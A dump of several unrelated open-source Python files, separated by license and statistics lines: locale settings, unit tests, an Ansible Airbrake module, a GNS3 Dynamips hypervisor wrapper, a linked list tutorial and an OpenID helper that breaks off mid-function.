# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
# '%d. %b %Y', '%d %b %Y', # '25. okt 2006', '25 okt 2006'
# '%d. %b. %Y', '%d %b. %Y', # '25. okt. 2006', '25 okt. 2006'
# '%d. %B %Y', '%d %B %Y', # '25. oktober 2006', '25 oktober 2006'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0' # non-breaking space
NUMBER_GROUPING = 3
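# Quick sketch of how the input formats above behave: Django hands these patterns
# to ``strptime`` when parsing localized form input. Plain ``datetime`` is used
# here for illustration, and the sample value is made up.
def _example_parse_norwegian_date(value='25.10.2006'):
    from datetime import datetime
    return datetime.strptime(value, '%d.%m.%Y').date()   # -> datetime.date(2006, 10, 25)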
| gpl-2.0 | 2,050,092,660,626,518,800 | 39.641026 | 81 | 0.535016 | false |
jstammers/EDMSuite | NavPython/IronPython/Tutorial/Extend/csxtest.py | 1 | 1219 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# Task 1
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
s = Simple(10)
print s
# Task 2
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
s = Simple(10)
for i in s: print i
# Task 3
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
a = Simple(10)
b = Simple(20)
a + b
# Task 4
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
a = Simple(10)
def X(i):
return i + 100
a.Transform(X)
| mit | 5,197,148,566,254,455,000 | 22 | 97 | 0.628384 | false |
pgleeson/TestArea | lib/jython/Lib/test/test_methods.py | 10 | 1114 | # Python test set -- part 7, bound and unbound methods
from test_support import *
print 'Bound and unbound methods (test_methods.py)'
class A:
def one(self): return 'one'
class B(A):
def two(self): return 'two'
class C(A):
def one(self): return 'another one'
a = A()
b = B()
c = C()
print 'unbound method equality'
assert A.one == B.one
assert A.one <> C.one
print 'method attributes'
assert A.one.im_func == a.one.im_func
assert a.one.im_self == a
assert a.one.im_class == A
assert b.one.im_self == b
assert b.one.im_class == B
print 'unbound method invocation w/ explicit self'
assert A.one(b) == 'one'
assert B.two(b) == 'two'
assert B.one(b) == 'one'
assert A.one(c) == 'one'
assert C.one(c) == 'another one'
assert A.one(a) == 'one'
try:
B.one(a)
assert 0
except TypeError:
pass
try:
C.one(a)
assert 0
except TypeError:
pass
print '"unbound" methods of builtin types'
w = [1,2,3].append
x = [4,5,6].append
assert w <> x
assert w.__self__ <> x.__self__
y = w.__self__[:]
z = x.__self__[:]
assert y.append.__self__ <> w
z.append(7)
assert z == (x.__self__+[7])
| gpl-2.0 | -5,978,282,553,769,381,000 | 16.967742 | 54 | 0.61939 | false |
rhattersley/iris | lib/iris/tests/unit/fileformats/pp_rules/test__dim_or_aux.py | 12 | 2233 | # (C) British Crown Copyright 2014 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for :func:`iris.fileformats.pp_rules._dim_or_aux`."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
from iris.coords import DimCoord, AuxCoord
from iris.fileformats.pp_rules import _dim_or_aux
class Test(tests.IrisTest):
def setUp(self):
self.mono = list(range(5))
self.non_mono = [0, 1, 3, 2, 4]
self.std_name = 'depth'
self.units = 'm'
self.attr = {'positive': 'up',
'wibble': 'wobble'}
def test_dim_monotonic(self):
result = _dim_or_aux(self.mono, standard_name=self.std_name,
units=self.units, attributes=self.attr.copy())
expected = DimCoord(self.mono, standard_name=self.std_name,
units=self.units, attributes=self.attr)
self.assertEqual(result, expected)
def test_dim_non_monotonic(self):
result = _dim_or_aux(self.non_mono, standard_name=self.std_name,
units=self.units, attributes=self.attr.copy())
attr = self.attr.copy()
del attr['positive']
expected = AuxCoord(self.non_mono, standard_name=self.std_name,
units=self.units, attributes=attr)
self.assertEqual(result, expected)
if __name__ == "__main__":
tests.main()
| lgpl-3.0 | 2,609,937,718,619,282,000 | 38.175439 | 75 | 0.655172 | false |
uclouvain/osis_louvain | assessments/tests/views/test_score_sheet.py | 1 | 5429 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import datetime
from unittest import mock
from django.core.urlresolvers import reverse
from django.test import TestCase, RequestFactory
from base.tests.factories.academic_year import AcademicYearFactory
from base.tests.factories.offer_year import OfferYearFactory
from assessments.views import score_sheet
from assessments.forms.score_sheet_address import ScoreSheetAddressForm
from django.test import Client
from base.tests.factories.user import SuperUserFactory
class OfferScoreSheetTabViewTest(TestCase):
def setUp(self):
today = datetime.date.today()
self.academic_year = AcademicYearFactory(start_date=today,
end_date=today.replace(year=today.year + 1),
year=today.year)
self.offer_year = OfferYearFactory(academic_year=self.academic_year)
self.COMMON_CONTEXT_KEYS = ['offer_year', 'countries', 'is_program_manager', 'entity_versions']
def test_get_common_context(self):
request = mock.Mock(method='GET')
context = score_sheet._get_common_context(request, self.offer_year.id)
self.assert_list_contains(list(context.keys()), self.COMMON_CONTEXT_KEYS)
@mock.patch('django.contrib.auth.decorators')
@mock.patch('base.views.layout.render')
def test_offer_score_encoding_tab(self, mock_render, mock_decorators):
mock_decorators.login_required = lambda x: x
mock_decorators.permission_required = lambda *args, **kwargs: lambda func: func
request_factory = RequestFactory()
request = request_factory.get(reverse('offer_score_encoding_tab', args=[self.offer_year.id]))
request.user = mock.Mock()
score_sheet.offer_score_encoding_tab(request, self.offer_year.id)
self.assertTrue(mock_render.called)
request, template, context = mock_render.call_args[0]
self.assertEqual(template, 'offer/score_sheet_address_tab.html')
context_keys = self.COMMON_CONTEXT_KEYS + ['entity_id_selected', 'form']
self.assert_list_contains(list(context.keys()), context_keys)
self.assertEqual(context['offer_year'], self.offer_year)
def assert_list_contains(self, container, member):
self.assertFalse([item for item in member if item not in container])
@mock.patch('assessments.business.score_encoding_sheet.save_address_from_entity')
@mock.patch('django.contrib.messages.add_message')
def test_save_score_sheet_address_case_reuse_entity_address(self,
mock_add_message,
mock_save_address_from_entity):
self.a_superuser = SuperUserFactory()
self.client.force_login(self.a_superuser)
url = reverse('save_score_sheet_address', args=[self.offer_year.id])
response = self.client.post(url, data={'related_entity': 1234})
self.assertTrue(mock_add_message.called)
self.assertEqual(response.url, reverse('offer_score_encoding_tab', args=[self.offer_year.id]))
@mock.patch('assessments.views.score_sheet._save_customized_address')
@mock.patch('django.contrib.auth.decorators')
@mock.patch('base.views.layout.render')
def test_save_score_sheet_address_case_customized_address(self, mock_render, mock_decorators, mock_save_customized_address):
mock_decorators.login_required = lambda x: x
mock_decorators.permission_required = lambda *args, **kwargs: lambda func: func
mock_save_customized_address.return_value = ScoreSheetAddressForm()
request_factory = RequestFactory()
request = request_factory.post(reverse('save_score_sheet_address', args=[self.offer_year.id]))
request.user = mock.Mock()
score_sheet.save_score_sheet_address(request, self.offer_year.id)
self.assertTrue(mock_render.called)
request, template, context = mock_render.call_args[0]
self.assertEqual(template, 'offer/score_sheet_address_tab.html')
self.assert_list_contains(list(context.keys()), self.COMMON_CONTEXT_KEYS + ['form'])
| agpl-3.0 | 5,302,085,797,211,989,000 | 50.207547 | 128 | 0.66986 | false |
ogenstad/ansible | lib/ansible/modules/monitoring/airbrake_deployment.py | 56 | 3599 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2013 Bruce Pennypacker <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: airbrake_deployment
version_added: "1.2"
author: "Bruce Pennypacker (@bpennypacker)"
short_description: Notify airbrake about app deployments
description:
- Notify airbrake about app deployments (see http://help.airbrake.io/kb/api-2/deploy-tracking)
options:
token:
description:
- API token.
required: true
environment:
description:
- The airbrake environment name, typically 'production', 'staging', etc.
required: true
user:
description:
- The username of the person doing the deployment
required: false
repo:
description:
- URL of the project repository
required: false
revision:
description:
- A hash, number, tag, or other identifier showing what revision was deployed
required: false
url:
description:
- Optional URL to submit the notification to. Use to send notifications to Airbrake-compliant tools like Errbit.
required: false
default: "https://airbrake.io/deploys.txt"
version_added: "1.5"
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
requirements: []
'''
EXAMPLES = '''
- airbrake_deployment:
token: AAAAAA
environment: staging
user: ansible
revision: '4.2'
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
from ansible.module_utils.six.moves.urllib.parse import urlencode
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
token=dict(required=True, no_log=True),
environment=dict(required=True),
user=dict(required=False),
repo=dict(required=False),
revision=dict(required=False),
url=dict(required=False, default='https://api.airbrake.io/deploys.txt'),
validate_certs=dict(default='yes', type='bool'),
),
supports_check_mode=True
)
# build list of params
params = {}
if module.params["environment"]:
params["deploy[rails_env]"] = module.params["environment"]
if module.params["user"]:
params["deploy[local_username]"] = module.params["user"]
if module.params["repo"]:
params["deploy[scm_repository]"] = module.params["repo"]
if module.params["revision"]:
params["deploy[scm_revision]"] = module.params["revision"]
params["api_key"] = module.params["token"]
url = module.params.get('url')
# If we're in check mode, just exit pretending like we succeeded
if module.check_mode:
module.exit_json(changed=True)
# Send the data to airbrake
data = urlencode(params)
response, info = fetch_url(module, url, data=data)
if info['status'] == 200:
module.exit_json(changed=True)
else:
module.fail_json(msg="HTTP result code: %d connecting to %s" % (info['status'], url))
if __name__ == '__main__':
main()
| gpl-3.0 | -2,904,783,041,118,055,400 | 27.338583 | 118 | 0.642956 | false |
harrijs/gns3-server | gns3server/modules/dynamips/hypervisor.py | 1 | 6210 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Represents a Dynamips hypervisor and starts/stops the associated Dynamips process.
"""
import os
import subprocess
import tempfile
import asyncio
from .dynamips_hypervisor import DynamipsHypervisor
from .dynamips_error import DynamipsError
import logging
log = logging.getLogger(__name__)
class Hypervisor(DynamipsHypervisor):
"""
Hypervisor.
:param path: path to Dynamips executable
:param working_dir: working directory
:param host: host/address for this hypervisor
:param port: port for this hypervisor
:param console_host: host/address for console connections
"""
_instance_count = 1
def __init__(self, path, working_dir, host, port, console_host):
super().__init__(working_dir, host, port)
        # create a unique ID
self._id = Hypervisor._instance_count
Hypervisor._instance_count += 1
self._console_host = console_host
self._path = path
self._command = []
self._process = None
self._stdout_file = ""
self._started = False
@property
def id(self):
"""
Returns the unique ID for this hypervisor.
:returns: id (integer)
"""
return self._id
@property
def started(self):
"""
Returns either this hypervisor has been started or not.
:returns: boolean
"""
return self._started
@property
def path(self):
"""
Returns the path to the Dynamips executable.
:returns: path to Dynamips
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path to the Dynamips executable.
:param path: path to Dynamips
"""
self._path = path
@asyncio.coroutine
def start(self):
"""
Starts the Dynamips hypervisor process.
"""
self._command = self._build_command()
try:
log.info("Starting Dynamips: {}".format(self._command))
with tempfile.NamedTemporaryFile(delete=False) as fd:
self._stdout_file = fd.name
log.info("Dynamips process logging to {}".format(fd.name))
self._process = yield from asyncio.create_subprocess_exec(*self._command,
stdout=fd,
stderr=subprocess.STDOUT,
cwd=self._working_dir)
log.info("Dynamips process started PID={}".format(self._process.pid))
self._started = True
except (OSError, subprocess.SubprocessError) as e:
log.error("Could not start Dynamips: {}".format(e))
raise DynamipsError("Could not start Dynamips: {}".format(e))
@asyncio.coroutine
def stop(self):
"""
Stops the Dynamips hypervisor process.
"""
if self.is_running():
log.info("Stopping Dynamips process PID={}".format(self._process.pid))
yield from DynamipsHypervisor.stop(self)
# give some time for the hypervisor to properly stop.
# time to delete UNIX NIOs for instance.
yield from asyncio.sleep(0.01)
try:
yield from asyncio.wait_for(self._process.wait(), timeout=3)
except asyncio.TimeoutError:
if self._process.returncode is None:
log.warn("Dynamips process {} is still running... killing it".format(self._process.pid))
self._process.kill()
if self._stdout_file and os.access(self._stdout_file, os.W_OK):
try:
os.remove(self._stdout_file)
except OSError as e:
log.warning("could not delete temporary Dynamips log file: {}".format(e))
self._started = False
def read_stdout(self):
"""
Reads the standard output of the Dynamips process.
Only use when the process has been stopped or has crashed.
"""
output = ""
if self._stdout_file and os.access(self._stdout_file, os.R_OK):
try:
with open(self._stdout_file, "rb") as file:
output = file.read().decode("utf-8", errors="replace")
except OSError as e:
log.warn("could not read {}: {}".format(self._stdout_file, e))
return output
def is_running(self):
"""
Checks if the process is running
:returns: True or False
"""
if self._process and self._process.returncode is None:
return True
return False
def _build_command(self):
"""
Command to start the Dynamips hypervisor process.
(to be passed to subprocess.Popen())
"""
command = [self._path]
command.extend(["-N1"]) # use instance IDs for filenames
command.extend(["-l", "dynamips_i{}_log.txt".format(self._id)]) # log file
# Dynamips cannot listen for hypervisor commands and for console connections on
# 2 different IP addresses.
# See https://github.com/GNS3/dynamips/issues/62
if self._console_host != "0.0.0.0" and self._console_host != "::":
command.extend(["-H", "{}:{}".format(self._host, self._port)])
else:
command.extend(["-H", str(self._port)])
return command
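# A minimal start/stop sketch for the class above. The executable path, working
# directory, host and port are placeholders, and the DynamipsHypervisor
# command/connection plumbing (e.g. connect()) that GNS3 normally performs
# between start() and stop() is omitted.
def _example_run_hypervisor():
    hypervisor = Hypervisor("/usr/bin/dynamips", "/tmp/gns3", "127.0.0.1", 7200, "127.0.0.1")
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(hypervisor.start())
        print("running: {}".format(hypervisor.is_running()))
    finally:
        loop.run_until_complete(hypervisor.stop())
        print(hypervisor.read_stdout())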
| gpl-3.0 | 3,943,120,844,863,544,300 | 31.010309 | 108 | 0.578744 | false |
boundlessgeo/QGIS | python/plugins/processing/tests/ProjectProvider.py | 8 | 4883 | # -*- coding: utf-8 -*-
"""
***************************************************************************
Project Provider tests
---------------------
Date : July 2018
Copyright : (C) 2018 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
 ***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'July 2018'
__copyright__ = '(C) 2018, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.testing import start_app, unittest
from qgis.PyQt.QtCore import QTemporaryFile
from qgis.core import (QgsApplication,
QgsProcessingModelAlgorithm,
QgsProject)
from processing.modeler.ProjectProvider import ProjectProvider
from processing.modeler.ModelerDialog import ModelerDialog
start_app()
class ProjectProviderTest(unittest.TestCase):
def testSaveRestoreFromProject(self):
p = QgsProject()
provider = ProjectProvider(p)
# add some algorithms
alg = QgsProcessingModelAlgorithm('test name', 'test group')
provider.add_model(alg)
alg2 = QgsProcessingModelAlgorithm('test name2', 'test group2')
provider.add_model(alg2)
self.assertEqual(len(provider.algorithms()), 2)
tmp_file = QTemporaryFile()
        tmp_file.open()  # fileName is not available until open
temp_path = tmp_file.fileName()
tmp_file.close()
self.assertTrue(p.write(temp_path))
# restore project
p2 = QgsProject()
provider2 = ProjectProvider(p2)
self.assertTrue(p2.read(temp_path))
self.assertEqual(len(provider2.model_definitions), 2)
self.assertEqual(len(provider2.algorithms()), 2)
self.assertEqual(provider2.algorithms()[0].name(), 'test name')
self.assertEqual(provider2.algorithms()[0].group(), 'test group')
self.assertEqual(provider2.algorithms()[1].name(), 'test name2')
self.assertEqual(provider2.algorithms()[1].group(), 'test group2')
# clear project should remove algorithms
p2.clear()
self.assertFalse(provider2.algorithms())
def testDelete(self):
"""
Test deleting a model from the project
"""
p = QgsProject()
provider = ProjectProvider(p)
# add some models
alg = QgsProcessingModelAlgorithm('test name', 'test group')
provider.add_model(alg)
alg2 = QgsProcessingModelAlgorithm('test name2', 'test group2')
provider.add_model(alg2)
self.assertEqual(len(provider.algorithms()), 2)
# try to delete
provider.remove_model(None)
self.assertEqual(len(provider.algorithms()), 2)
# not in provider!
alg3 = QgsProcessingModelAlgorithm('test name3', 'test group')
provider.remove_model(alg3)
self.assertEqual(len(provider.algorithms()), 2)
# delete model actually in project
provider.remove_model(alg)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].name(), 'test name2')
# overwrite model
alg2b = QgsProcessingModelAlgorithm('test name2', 'test group2')
alg2b.setHelpContent({'test': 'test'})
provider.add_model(alg2b)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].helpContent(), {'test': 'test'})
provider.remove_model(alg2)
self.assertEqual(len(provider.algorithms()), 0)
def testDialog(self):
"""
Test saving model to project from dialog
"""
p = QgsProject().instance()
provider = ProjectProvider()
QgsApplication.processingRegistry().addProvider(provider)
# make an algorithm
alg = QgsProcessingModelAlgorithm('test name', 'test group')
dialog = ModelerDialog(alg)
dialog.saveInProject()
self.assertEqual(len(provider.model_definitions), 1)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].name(), 'test name')
self.assertEqual(provider.algorithms()[0].group(), 'test group')
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 297,816,019,104,723,400 | 35.440299 | 82 | 0.580176 | false |
insiderr/insiderr-app | ios-patches/basemodules/twisted/python/test/test_runtime.py | 33 | 5431 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.python.runtime}.
"""
from __future__ import division, absolute_import
import sys
from twisted.trial.util import suppress as SUPRESS
from twisted.trial.unittest import SynchronousTestCase
from twisted.python.runtime import Platform, shortPythonVersion
class PythonVersionTests(SynchronousTestCase):
"""
Tests the shortPythonVersion method.
"""
def test_shortPythonVersion(self):
"""
Verify if the Python version is returned correctly.
"""
ver = shortPythonVersion().split('.')
for i in range(3):
self.assertEqual(int(ver[i]), sys.version_info[i])
class PlatformTests(SynchronousTestCase):
"""
Tests for the default L{Platform} initializer.
"""
isWinNTDeprecationMessage = ('twisted.python.runtime.Platform.isWinNT was '
'deprecated in Twisted 13.0. Use Platform.isWindows instead.')
def test_isKnown(self):
"""
L{Platform.isKnown} returns a boolean indicating whether this is one of
the L{runtime.knownPlatforms}.
"""
platform = Platform()
self.assertTrue(platform.isKnown())
def test_isVistaConsistency(self):
"""
Verify consistency of L{Platform.isVista}: it can only be C{True} if
L{Platform.isWinNT} and L{Platform.isWindows} are C{True}.
"""
platform = Platform()
if platform.isVista():
self.assertTrue(platform.isWinNT())
self.assertTrue(platform.isWindows())
self.assertFalse(platform.isMacOSX())
def test_isMacOSXConsistency(self):
"""
L{Platform.isMacOSX} can only return C{True} if L{Platform.getType}
returns C{'posix'}.
"""
platform = Platform()
if platform.isMacOSX():
self.assertEqual(platform.getType(), 'posix')
def test_isLinuxConsistency(self):
"""
L{Platform.isLinux} can only return C{True} if L{Platform.getType}
returns C{'posix'} and L{sys.platform} starts with C{"linux"}.
"""
platform = Platform()
if platform.isLinux():
self.assertTrue(sys.platform.startswith("linux"))
def test_isWinNT(self):
"""
L{Platform.isWinNT} can return only C{False} or C{True} and can not
return C{True} if L{Platform.getType} is not C{"win32"}.
"""
platform = Platform()
isWinNT = platform.isWinNT()
self.assertIn(isWinNT, (False, True))
if platform.getType() != "win32":
self.assertEqual(isWinNT, False)
test_isWinNT.suppress = [SUPRESS(category=DeprecationWarning,
message=isWinNTDeprecationMessage)]
def test_isWinNTDeprecated(self):
"""
L{Platform.isWinNT} is deprecated in favor of L{platform.isWindows}.
"""
platform = Platform()
result = platform.isWinNT()
warnings = self.flushWarnings([self.test_isWinNTDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(
warnings[0]['message'], self.isWinNTDeprecationMessage)
def test_supportsThreads(self):
"""
L{Platform.supportsThreads} returns C{True} if threads can be created in
this runtime, C{False} otherwise.
"""
# It's difficult to test both cases of this without faking the threading
# module. Perhaps an adequate test is to just test the behavior with
# the current runtime, whatever that happens to be.
try:
import threading
except ImportError:
self.assertFalse(Platform().supportsThreads())
else:
self.assertTrue(Platform().supportsThreads())
class ForeignPlatformTests(SynchronousTestCase):
"""
Tests for L{Platform} based overridden initializer values.
"""
def test_getType(self):
"""
If an operating system name is supplied to L{Platform}'s initializer,
L{Platform.getType} returns the platform type which corresponds to that
name.
"""
self.assertEqual(Platform('nt').getType(), 'win32')
self.assertEqual(Platform('ce').getType(), 'win32')
self.assertEqual(Platform('posix').getType(), 'posix')
self.assertEqual(Platform('java').getType(), 'java')
def test_isMacOSX(self):
"""
If a system platform name is supplied to L{Platform}'s initializer, it
is used to determine the result of L{Platform.isMacOSX}, which returns
C{True} for C{"darwin"}, C{False} otherwise.
"""
self.assertTrue(Platform(None, 'darwin').isMacOSX())
self.assertFalse(Platform(None, 'linux2').isMacOSX())
self.assertFalse(Platform(None, 'win32').isMacOSX())
def test_isLinux(self):
"""
If a system platform name is supplied to L{Platform}'s initializer, it
is used to determine the result of L{Platform.isLinux}, which returns
C{True} for values beginning with C{"linux"}, C{False} otherwise.
"""
self.assertFalse(Platform(None, 'darwin').isLinux())
self.assertTrue(Platform(None, 'linux').isLinux())
self.assertTrue(Platform(None, 'linux2').isLinux())
self.assertTrue(Platform(None, 'linux3').isLinux())
self.assertFalse(Platform(None, 'win32').isLinux())
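
# Added illustrative note (not part of the original test module): outside the
# test suite, code usually consults the module-level singleton rather than
# constructing Platform directly, e.g.:
#
#   from twisted.python.runtime import platform
#   if platform.supportsThreads():
#       ...  # safe to build a thread pool here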
| gpl-3.0 | 2,304,804,071,937,037,800 | 31.915152 | 80 | 0.631375 | false |
vprusso/youtube_tutorials | data_structures/linked_list/circular_linked_list/circular_linked_list_remove.py | 1 | 2755 | # YouTube Video: https://www.youtube.com/watch?v=op42w-5o3nE
class Node:
def __init__(self, data):
self.data = data
self.next = None
class CircularLinkedList:
def __init__(self):
self.head = None
def prepend(self, data):
new_node = Node(data)
cur = self.head
new_node.next = self.head
if not self.head:
new_node.next = new_node
else:
while cur.next != self.head:
cur = cur.next
cur.next = new_node
self.head = new_node
def append(self, data):
if not self.head:
self.head = Node(data)
self.head.next = self.head
else:
new_node = Node(data)
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = new_node
new_node.next = self.head
def print_list(self):
cur = self.head
while cur:
print(cur.data)
cur = cur.next
if cur == self.head:
break
def __len__(self):
cur = self.head
count = 0
while cur:
count += 1
cur = cur.next
if cur == self.head:
break
return count
def split_list(self):
size = len(self)
if size == 0:
return None
if size == 1:
return self.head
mid = size//2
count = 0
prev = None
cur = self.head
while cur and count < mid:
count += 1
prev = cur
cur = cur.next
prev.next = self.head
split_cllist = CircularLinkedList()
while cur.next != self.head:
split_cllist.append(cur.data)
cur = cur.next
split_cllist.append(cur.data)
self.print_list()
print("\n")
split_cllist.print_list()
def remove(self, key):
if self.head.next == self.head and self.head.data == key:
self.head = None
return
if self.head.data == key:
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = self.head.next
self.head = self.head.next
else:
cur = self.head
prev = None
while cur.next != self.head:
prev = cur
cur = cur.next
if cur.data == key:
prev.next = cur.next
cur = cur.next
cllist = CircularLinkedList()
cllist.append("A")
cllist.append("B")
cllist.append("C")
cllist.append("D")
cllist.remove("A")
cllist.remove("C")
cllist.print_list()
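
# Extra demo (added for illustration; not part of the original tutorial video):
# removing the last remaining node exercises the single-node branch of remove(),
# which clears the head reference entirely.
single_cllist = CircularLinkedList()
single_cllist.append("X")
single_cllist.remove("X")
print(single_cllist.head)  # expected output: None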
| gpl-3.0 | 3,223,161,314,811,393,000 | 22.956522 | 65 | 0.471143 | false |
fiddlerwoaroof/sandbox | unsorted/pythonsnippets_0045.py | 1 | 1853 | import functools
import collections
def instantiate(cls): return cls()
class Namespace(object):
def registry(name, bases, dict_):
cls = type(name, bases, dict_)
cls.__dict = {}
return cls
__metaclass__ = registry
def __init__(self, instance=None):
self.__dict__ = self.__dict
self.__inst = instance
self._init()
def _init(self): pass
def __get__(self, instance, owner):
result = type(self)(instance)
return result
def __check_inst(self):
if self.__inst is None:
raise AttributeError, 'this class is unbound, can\'t call methods'
def __getattribute__(self, name):
if not name.startswith('_'):
self.__check_inst()
result = object.__getattribute__(self, name)
if callable(result) and not name.startswith('_'):
result = functools.partial(result, self.__inst)
return result
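
# Explanatory note (added; not in the original snippet): Namespace doubles as a
# registry and a descriptor. The registry metaclass gives each Namespace
# subclass one shared dict, __get__ returns a fresh copy bound to the accessing
# DB instance, and __getattribute__ wraps every public method in
# functools.partial so the owning DB instance is passed as the first argument --
# e.g. db.record.get() ends up calling record.get(db).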
class DB(object):
@instantiate
class record(Namespace):
@classmethod
def _init(self):
self.__value = 1
def get(self, db):
return self.__value
def set(self, db, value):
self.__value = value
def checkparam(self, db):
print db.param.get()
return db.param.get() == self.get()
@instantiate
class param(Namespace):
@classmethod
def _init(self):
self.__value = 1
def get(self, db):
db.othermethod(self.__value)
return self.__value
def set(self, db, value):
db.othermethod(self.__value)
self.__value = value
db.othermethod(self.__value)
def othermethod(self, value): print self, value
def recordget(self): return self.record.get()
def recordset(self, value): return self.record.set(value) | bsd-3-clause | -4,709,682,532,446,254,000 | 30.423729 | 78 | 0.560712 | false |
CollabQ/CollabQ | poboxopenid/util.py | 1 | 2590 | import logging
from django import http
from django.conf import settings
from common import api
from common import clean
from common.models import ExternalProfile
from common import memcache
from common import twitter
from common import user
from common import util
def get_nick_from_email(email):
nick = util.display_nick(email).replace('.', '').replace('_', '')
view = api.actor_lookup_nick(api.ROOT, nick)
if view:
cont = 1
while view is not None:
nick_next = nick+str(cont)
cont+=1
view = api.actor_lookup_nick(api.ROOT, nick_next)
if view is None:
nick = nick_next
return nick
def reponse_if_exists(id, service=None):
if service is None:
view = api.actor_lookup_email(api.ROOT, id)
else:
eprofile = api.get_external_profile(service, id)
if eprofile is not None:
nick = clean.nick(eprofile.nick)
view = api.actor_lookup_nick(api.ROOT, nick)
else:
return None
if view:
response = http.HttpResponseRedirect(view.url('/overview'))
response = user.set_user_cookie(response, view)
return response
return None
def user_create(service, params, username='', id='', remote_url=''):
logging.info("user_create")
actor_ref = api.user_create(api.ROOT, **params)
actor_ref.access_level = "delete"
api.post(actor_ref,
nick=actor_ref.nick,
message='Joined %s!' % (util.get_metadata('SITE_NAME')))
email = params.get('email', None)
if email is not None:
api.email_associate(api.ROOT, actor_ref.nick, email)
else:
key = 'emailneeded_%s' % util.display_nick(actor_ref.nick)
memcache.client.set(key, True, 360)
key = 'firsttime_%s' % util.display_nick(actor_ref.nick)
memcache.client.set(key, True, 360)
external_profile_ref = api.create_external_profile(actor_ref.nick, service, username, id, remote_url)
return actor_ref
def get_full_path(request):
full_path = ('http', ('', 's')[request.is_secure()], '://',
request.META['HTTP_HOST'], request.path)
return ''.join(full_path)
def get_continue_url(request, default_success_url):
continueUrl = request.GET.get('continue', default_success_url)
# Sanitize
